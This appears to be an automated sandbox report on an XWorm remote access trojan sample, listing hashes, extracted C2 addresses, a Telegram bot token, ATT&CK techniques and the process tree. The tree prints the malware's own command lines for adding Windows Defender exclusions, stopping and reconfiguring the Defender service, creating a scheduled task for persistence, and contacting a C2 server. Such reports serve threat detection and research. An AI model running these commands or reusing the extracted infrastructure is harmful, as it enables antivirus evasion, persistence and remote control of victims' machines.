xworm | e819962c084d4fad69a9f30b7a4e5d2cbb3d7e9af3f4a19b7a285ad3630d1da8

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
15/04/2024, 02:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Standlaunchpad.exe
Size

132KB
MD5

716265d64dd58c6f312693e6c69844e1
SHA1

6db8ea7cdc175319aef202c1c61b228bdce2ae9b
SHA256

e819962c084d4fad69a9f30b7a4e5d2cbb3d7e9af3f4a19b7a285ad3630d1da8
SHA512

a9dc84f961f3c363cfe129f5e9f5e3311a95d9defb84b59e99d428b4e1a432e23f3016dae993e12744335c915b0902e17c74c0c37b5c330b92357254250ba801
SSDEEP

1536:buFEExqQ91YIprw6LUWIzQ2rk/xww6Ubv3bVuxPuz/5jcRU9DUq7HlxJxZr:b7Q9yIp9IhT8H6Ubv3pWu9z9DUqxx5r

Score

10^/10

xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:18082

147.185.221.18:18082

8.tcp.us-cal-1.ngrok.io:18082

Attributes

Install_directory
%Temp%
install_file
Stand.exe
telegram
https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/3604-103-0x000000001C890000-0x000000001C89E000-memory.dmp	disable_win_def

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000a0000000233d9-6.dat	family_xworm
behavioral2/memory/3604-15-0x0000000000800000-0x000000000081E000-memory.dmp	family_xworm

Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3604 created 668	3604	Standlaunchpad.exe	7

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	Standlaunchpad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	Standlaunchpad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	Stand.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe

Executes dropped EXE 3 IoCs

pid	Process
3604	Standlaunchpad.exe
4248	Stand.exe
4340	Stand.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Standlaunchpad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Stand.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
61	8.tcp.us-cal-1.ngrok.io

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ip-api.com
77	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3604 set thread context of 1216	3604	Standlaunchpad.exe	127

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2348	sc.exe
4656	sc.exe
1072	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3344	schtasks.exe
5056	schtasks.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3032	bitsadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	Standlaunchpad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
3604	Standlaunchpad.exe
1484	explorer.exe
4340	Stand.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
4832	powershell.exe
4832	powershell.exe
4832	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3744	XClient.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe
3604	Standlaunchpad.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	3604	Standlaunchpad.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	3604	Standlaunchpad.exe
Token: SeDebugPrivilege	3744	XClient.exe
Token: SeDebugPrivilege	4248	Stand.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	540	whoami.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3424	whoami.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	4340	Stand.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	4340	Stand.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3604	Standlaunchpad.exe
1484	explorer.exe
1484	explorer.exe
4340	Stand.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 3604	1696	Standlaunchpad.exe	85
PID 1696 wrote to memory of 3604	1696	Standlaunchpad.exe	85
PID 1696 wrote to memory of 3824	1696	Standlaunchpad.exe	86
PID 1696 wrote to memory of 3824	1696	Standlaunchpad.exe	86
PID 1696 wrote to memory of 3824	1696	Standlaunchpad.exe	86
PID 3824 wrote to memory of 3032	3824	mshta.exe	91
PID 3824 wrote to memory of 3032	3824	mshta.exe	91
PID 3824 wrote to memory of 3032	3824	mshta.exe	91
PID 3604 wrote to memory of 1352	3604	Standlaunchpad.exe	97
PID 3604 wrote to memory of 1352	3604	Standlaunchpad.exe	97
PID 3604 wrote to memory of 5096	3604	Standlaunchpad.exe	99
PID 3604 wrote to memory of 5096	3604	Standlaunchpad.exe	99
PID 3604 wrote to memory of 4832	3604	Standlaunchpad.exe	101
PID 3604 wrote to memory of 4832	3604	Standlaunchpad.exe	101
PID 3604 wrote to memory of 4500	3604	Standlaunchpad.exe	103
PID 3604 wrote to memory of 4500	3604	Standlaunchpad.exe	103
PID 3604 wrote to memory of 3344	3604	Standlaunchpad.exe	105
PID 3604 wrote to memory of 3344	3604	Standlaunchpad.exe	105
PID 3824 wrote to memory of 3744	3824	mshta.exe	108
PID 3824 wrote to memory of 3744	3824	mshta.exe	108
PID 3604 wrote to memory of 2348	3604	Standlaunchpad.exe	113
PID 3604 wrote to memory of 2348	3604	Standlaunchpad.exe	113
PID 3604 wrote to memory of 4500	3604	Standlaunchpad.exe	114
PID 3604 wrote to memory of 4500	3604	Standlaunchpad.exe	114
PID 3604 wrote to memory of 540	3604	Standlaunchpad.exe	116
PID 3604 wrote to memory of 540	3604	Standlaunchpad.exe	116
PID 3604 wrote to memory of 4364	3604	Standlaunchpad.exe	117
PID 3604 wrote to memory of 4364	3604	Standlaunchpad.exe	117
PID 3604 wrote to memory of 1992	3604	Standlaunchpad.exe	118
PID 3604 wrote to memory of 1992	3604	Standlaunchpad.exe	118
PID 3604 wrote to memory of 4284	3604	Standlaunchpad.exe	119
PID 3604 wrote to memory of 4284	3604	Standlaunchpad.exe	119
PID 4284 wrote to memory of 4656	4284	powershell.exe	121
PID 4284 wrote to memory of 4656	4284	powershell.exe	121
PID 4284 wrote to memory of 4176	4284	powershell.exe	122
PID 4284 wrote to memory of 4176	4284	powershell.exe	122
PID 4284 wrote to memory of 3424	4284	powershell.exe	124
PID 4284 wrote to memory of 3424	4284	powershell.exe	124
PID 4284 wrote to memory of 3376	4284	powershell.exe	125
PID 4284 wrote to memory of 3376	4284	powershell.exe	125
PID 4284 wrote to memory of 1072	4284	powershell.exe	126
PID 4284 wrote to memory of 1072	4284	powershell.exe	126
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 3604 wrote to memory of 1216	3604	Standlaunchpad.exe	127
PID 1216 wrote to memory of 3528	1216	cvtres.exe	128
PID 1216 wrote to memory of 3528	1216	cvtres.exe	128
PID 1216 wrote to memory of 3528	1216	cvtres.exe	128
PID 3528 wrote to memory of 4432	3528	powershell.exe	130
PID 3528 wrote to memory of 4432	3528	powershell.exe	130
PID 3528 wrote to memory of 4432	3528	powershell.exe	130
PID 4340 wrote to memory of 4868	4340	Stand.exe	134
PID 4340 wrote to memory of 4868	4340	Stand.exe	134
PID 4340 wrote to memory of 4708	4340	Stand.exe	136
PID 4340 wrote to memory of 4708	4340	Stand.exe	136
PID 4340 wrote to memory of 2284	4340	Stand.exe	138
PID 4340 wrote to memory of 2284	4340	Stand.exe	138
PID 4340 wrote to memory of 4876	4340	Stand.exe	140
PID 4340 wrote to memory of 4876	4340	Stand.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:4656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:4176
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:3376
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:1072

C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe
"C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe
  "C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4500
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3344
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:2348
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:4500
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" start TrustedInstaller
    3⤵
    PID:4364
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" start lsass
    3⤵
    PID:1992
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 52.9.153.64 18082 <123456789> 759E49890B1E439C650F
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1216
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3528
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
        5⤵
        
        PID:4432
